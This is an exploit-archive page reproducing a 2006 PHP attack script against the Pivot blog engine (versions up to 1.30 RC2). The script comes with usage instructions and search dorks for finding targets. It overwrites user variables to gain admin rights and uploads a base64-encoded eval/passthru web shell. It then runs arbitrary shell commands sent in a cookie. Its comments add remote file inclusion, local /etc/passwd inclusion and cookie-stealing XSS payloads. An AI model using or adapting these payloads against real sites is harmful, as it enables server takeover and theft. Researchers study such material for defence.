Advertisement






Pivot <=1.30rc2 privilege escalation / remote commands execution

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX $Unknown Unknown
Author Risk Exploitation Type Date
Unknown Unknown Remote 2006-07-25
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.735 0.99426

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070065

Below is a copy:

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Pivot <= 1.30 RC2 privileges escalation / remote commands execution exploitn";

echo "by rgod rgod (at) autistici (dot) org [email concealed]n";

echo "site: http://retrogod.altervista.orgn";

echo "dorks: "Powered byPivot"n";

echo "version specific: "Powered byPivot - 1.30 RC2" +Rippersnappernn";

/*

works with register_globals=On

*/

if ($argc<4) {

echo "Usage: php ".$argv[0]." host path cmd OPTIONSn";

echo "host:       target server (ip/hostname)n";

echo "path:       path to the blogn";

echo "cmd:        a shell commandn";

echo "Options:n";

echo "   -p[port]:    specify a port other than 80n";

echo "   -P[ip:port]: specify a proxyn";

echo "Examples:n";

echo "php ".$argv[0]." localhost /blog/ ls -la -p81n";

echo "php ".$argv[0]." localhost /blog/ ls -la -P1.1.1.1:80nn";

die;

}

/* software site: http://www.pivotlog.net/

i) vulnerable code in pv_core.php at line 23-24 and in CheckLogin() function:

...

// some global initialisation stuff

$Pivot_Vars = array_merge($_GET , $_POST, $_SERVER);

...

function CheckLogin() {

global $Users, $Pivot_Vars, $Cfg;

// User is banned..

if(isset($Cfg['bn_' . $_SERVER['REMOTE_ADDR']])){

Login(1, 1, "User is banned");

}

// added to not check for referers if no session id is given..

if(!isset($Pivot_Vars['session'])){                                                    <-------------[!]

$uri = 'http://' . $Pivot_Vars['HTTP_HOST'] . $Pivot_Vars['SCRIPT_NAME'];

if(strpos($Pivot_Vars['HTTP_REFERER'], $uri)!=0){

$Pivot_Vars['user'] = '';

Login(0, 2, "No session active.");

}

}

// If we selected logout from the menu..

if( isset($Pivot_Vars['func']) && ($Pivot_Vars['func'] == 'login') && isset($Pivot_Vars['do']) && ($Pivot_Vars['do'] == 'logout')){

setcookie('user', '', -9999,"/");

setcookie('pass', '', -9999,"/");

setcookie('mode', 'nothing', -9999,"/");

unset($Users[$Cfg['tempsessions'][$Pivot_Vars['session']][0]]['session']
);

unset($Cfg['tempsessions'][$Pivot_Vars['session']]);

SaveSettings();

login(0,3, "User logged off");

}

// if the user has cookies set, but no session is active yet..

if( isset($_COOKIE['user']) && isset($_COOKIE['hash']) && ($_COOKIE['mode'] == 'stayloggedin') &&        <----------- [!!!]

( (!isset($Pivot_Vars['session'])) || ($Pivot_Vars['session'] == "")) ) {

debug("attempted ReviveSession..");

// Try to revive an old Session..

ReviveSession();

} else if(($Pivot_Vars['func'] == 'login') || ($Pivot_Vars['do'] == 'login')) {

// if we've just logged in, reset the cookies, if necesary and start a new session..

debug("attempted login..");

if ( ($Users[$Pivot_Vars['user']]['pass'] == md5($Pivot_Vars['pass']))                           <-------------- [!!!!]

&& ($Users[$Pivot_Vars['user']]['userlevel']>0) ) {

NewSession($Pivot_Vars['user']);

}else{

// add one to the failed login attempts.

if(strlen($Pivot_Vars['user']) > 0) {

$Cfg['fl_' . $_SERVER['REMOTE_ADDR']]++;

}

Login(1,4, "Incorrect username or password");

}

} else {

// when running normally, the session stuff is updated.

$Pivot_Vars['user'] = $Cfg['tempsessions'][$Pivot_Vars['session']][0];

$ip = substr( $_SERVER['REMOTE_ADDR'], 0, strrpos( $_SERVER['REMOTE_ADDR'], "."));

// calculated locally: user's pass + current session + ip we got from user

$hash1 = md5( md5( $Users[$Pivot_Vars['user']]['pass'] . $Pivot_Vars['session'] ) . $ip ) ;

// stored hash

$hash2 = $Cfg['tempsessions'][$Pivot_Vars['session']][1];

// we check if the two hash matches with the one that was stored

if ($hash1 != $hash2) {

// if this is the case, something's not ok, so go back to login..

Login(0,0, "No hacking, please");

}

}

// If by this point no session is set, we will show the login screen..

if(strlen($Pivot_Vars['session']) == 0) {

Login(0,8, "Please log on. (if you keep getting this message, delete the cookies for this site)");

}

// Update the timer, so we can keep the user logged in.

if($Cfg['tempsessions'][$Pivot_Vars['session']][2] - time() <= ($Cfg['session_length'] / 4)) {

$Cfg['tempsessions'][$Pivot_Vars['session']][2] = $Cfg['tempsessions'][$Pivot_Vars['session']][2] + $Cfg['session_length'];

}

}

...

a remote user can overwrite $Pivot_Vars array and, if register_globals=on,

$Users one, to escalate privileges, then he can upload php files in images/ folder

through the includes/editor/insert_image.php script

ii)

arbitrary remote inclusion (on php5) with register_globals=On

http://[target]/pivot/includes/edit_new.php?Paths[extensions_path]=ftp:/
/username:password (at) somehost (dot) com [email concealed]/

where on somehost.com we have a

hooks/pre_editor_normal.php with some shellcode inside

and local inclusion with register_globals=On & magic_quotes_gpc=Off

http://[target]/pivot/includes/edit_new.php?Paths[extensions_path]=/etc/
passwd%00

iii) various xss with register_globals=On:

http://[target]/[path]/pivot/includes/blogroll.php?fg=[XSS]

http://[target]/[path]/pivot/includes/blogroll.php?line1=[XSS]

http://[target]/[path]/pivot/includes/blogroll.php?line2=[XSS]

http://[target]/[path]/pivot/includes/blogroll.php?bg=[XSS]

http://[target]/[path]/pivot/includes/blogroll.php?c1=[XSS]

http://[target]/[path]/pivot/includes/blogroll.php?c2=[XSS]

http://[target]/[path]/pivot/includes/blogroll.php?c3=[XSS]

http://[target]/[path]/pivot/includes/blogroll.php?c4=[XSS]

http://[target]/[path]/pivot/includes/editor/edit_menu.php?name=[XSS]

http://[target]/[path]/pivot/includes/editor/edit_menu.php?js_name=[XSS]

iv) regardless of magic_quotes_gpc, xss:

http://[target]/[path]/pivot/includes/photo.php?h=><script>alert(documen
t.cookie)</script>

http://[target]/[path]/pivot/includes/photo.php?w=><script>alert(documen
t.cookie)</script>

this is the poc exploit tool for i)

*/

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.="  .";}

else

{$result.="  ".$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}

}

return $exa."rn".$result;

}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "rn".$html;

}

$host=$argv[1];

$path=$argv[2];

$cmd="";

$port=80;

$proxy="";

for ($i=3; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if (($temp<>"-p") and ($temp<>"-P"))

{$cmd.=" ".$argv[$i];}

if ($temp=="-p")

{

$port=str_replace("-p","",$argv[$i]);

}

if ($temp=="-P")

{

$proxy=str_replace("-P","",$argv[$i]);

}

}

$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$magic_var="suntzu"; //no matter how you call him

$shell="error_reporting(0);if(get_magic_quotes_gpc()){$_COOKIE["cmd"]
=stripslashes($_COOKIE["cmd"]);}set_time_limit(0);echo "my_delim";passthru($_COOKIE["cmd"]);echo "my_delim";";

$shell=base64_encode($shell);

$data='-----------------------------7d62702f250530

Content-Disposition: form-data; name="userfile"; filename="cfg.php";

Content-Type: text/plain

<?php;eval(base64_decode("'.$shell.'"));?>

-----------------------------7d62702f250530--

';

$packet="POST ".$p."pivot/includes/editor/insert_image.php?session=".$magic_var."&func
=login&pass=".$magic_var."&user=".$magic_var."&Users[".$magic_var."][pas
s]=".md5($magic_var)."&Users[".$magic_var."][userlevel]=1 HTTP/1.0rn";

$packet.="User-Agent: Googlebot/2.1rn";

$packet.="Host: ".$host."rn";

$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530rn";

$packet.="Content-Length: ".strlen($data)."rn";

$packet.="Cookie: hash=; mode=stayloggedin; user=;rn";

$packet.="Connection: Closernrn";

$packet.=$data;

sendpacketii($packet);

sleep(1);

//shell.php is renamed to shell.php.php

$packet="GET ".$p."images/cfg.php.php HTTP/1.0rn";

$packet.="User-Agent: Googlebot/2.1rn";

$packet.="Host: ".$host."rn";

$packet.="Cookie: cmd=".$cmd.";rn";

$packet.="Connection: Closernrn";

sendpacketii($packet);

if (strstr($html,"my_delim"))

{

$temp=explode("my_delim",$html);

die("exploit succeeded...nn".$temp[1]);

}

//if you are here...

echo "exploit failed...";

?>

original url: http://retrogod.altervista.org/pivot_130RC2_xpl.html

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum